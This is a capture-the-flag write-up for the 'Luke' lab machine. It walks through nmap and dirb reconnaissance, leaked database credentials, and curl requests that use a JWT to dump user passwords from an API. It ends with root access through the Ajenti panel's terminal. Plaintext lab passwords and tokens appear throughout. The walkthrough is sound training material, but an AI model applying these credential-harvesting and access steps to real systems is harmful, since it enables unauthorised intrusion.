Luke - 10.10.10.137
Difficulty score: 6
14 Sep 2019Write-up by Andrea Melis @wild_boar
USER
Reconnaissance
NMAP
As usual we always start with Nmap scanning:
root@pentestbox:~# nmap -sC -sV -oA luke 10.10.10.137 Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-20 00:13 CEST Nmap scan report for 10.10.10.137 Host is up (0.036s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) 22/tcp open ssh? 80/tcp open http 3000/tcp open http Node.js Express framework 8000/tcp open http Ajenti http control panel
It seems there is anonymoys ftp login, so we logged in and there is only one file available, which download tell us:
$ cat for_Chihiro.txt Dear Chihiro !! As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created . Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! Derry
So it may look like there is an hidden website or page somewhere. So, first of all we scanned all possible files and folder over the port 80 and 3000 which look like a website over 80 port:
And over port 3000 a simple node js api service:
DirBuster
With dirbuster and big.txt wordlist we found some interesting file such as:
File found: /config.php - 200 Dir found: /css/ - 200 File found: /css/bootstrap.min.css - 200 File found: /css/scrolling-nav.css - 200File found: /css/signin.css - 200
Where config.php retrieved us what it looks as db credentials:
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword =
'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost,
$dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn ->
error);
But those credentials were incorrect for the login.php and /management login which we found with dirb. So we start to look at the js api service. We needed to retrieve the available api so we used dirb again over this port:
$dirb http://10.10.10.137:3000 -w /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Sep 20 00:37:31 2019 URL_BASE: http://10.10.10.137:3000/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Stopping on warning messages ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.137:3000/ ---- + http://10.10.10.137:3000/login (CODE:200|SIZE:13) + http://10.10.10.137:3000/Login (CODE:200|SIZE:13) + http://10.10.10.137:3000/users (CODE:200|SIZE:56) ----------------- END_TIME: Fri Sep 20 00:40:28 2019 DOWNLOADED: 4612 - FOUND: 3
So we have a login api and users api. Users api needs and authenticaton token probably supplied by the /login api. So first we tried to login we the credentials found in the config.php file.
$ curl --header "Content-Type: application/json" \
> --request POST \
> --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' \
> http://10.10.10.137:3000/login
{"success":true,"message":"Authentication
successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2Vybm
FtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTMyODcwLCJleHAiOjE1NjkwMTky
NzB9.NkXilej8x5JP2MOHRz3SDkgPs3AVz4YEmtg2s_H0siY"}
Success!!
The post requests give us the access token, which we can use to query the /users api:
$ curl -X GET -H 'Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwi
aWF0IjoxNTY4OTMyODcwLCJleHAiOjE1NjkwMTkyNzB9.NkXilej8x5JP2
MOHRz3SDkgPs3AVz4YEmtg2s_H0siY' http://10.10.10.137:3000/users/
[{"ID":"1","name":"Admin","Role":"Superuser"},
{"ID":"2","name":"Derry","Role":"Web Admin"},
{"ID":"3","name":"Yuri","Role":"Beta Tester"},
{"ID":"4","name":"Dory","Role":"Supporter"}]
Perfect! We have users now, let’s try to query one user at time:
$ curl -X GET \
> -H 'Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwi
aWF0IjoxNTY4OTMyODcwLCJleHAiOjE1NjkwMTkyNzB9.NkXilej8x5JP2
MOHRz3SDkgPs3AVz4YEmtg2s_H0siY' \
> http://10.10.10.137:3000/users/Dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
bet@tester87
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
In fact we discovered after several tries that the Derry credentials were correct for the /management panel And this is what looks like the management panel; we just have some files config.php login.php which we already had:
But now we alse have config.json file! Which looks really interesting since seems to be something related to ajenti page, which is the login page discovered on port 8000: This is what login page looks like:
And this is otherwise what the config.json file shows on /management page:
What is immediately visible is the password field;which seems to be the admin password for ajenti login.
password "KpMasng6S5EtTy9Z"
So Username root and password KpMasng6S5EtTy9Z:
Logged in!!
ROOT
This looks like Ajenti backend and after several google research we noticed that there a “Terminal” options which it open a terminal with bash with the user privileges, in our case guess what… root!! So clicking on terminal and running a new one gave us a perfect shell with root priv:
From here we can also of course create a reverse shell to our host machine but the flag is already retrieved.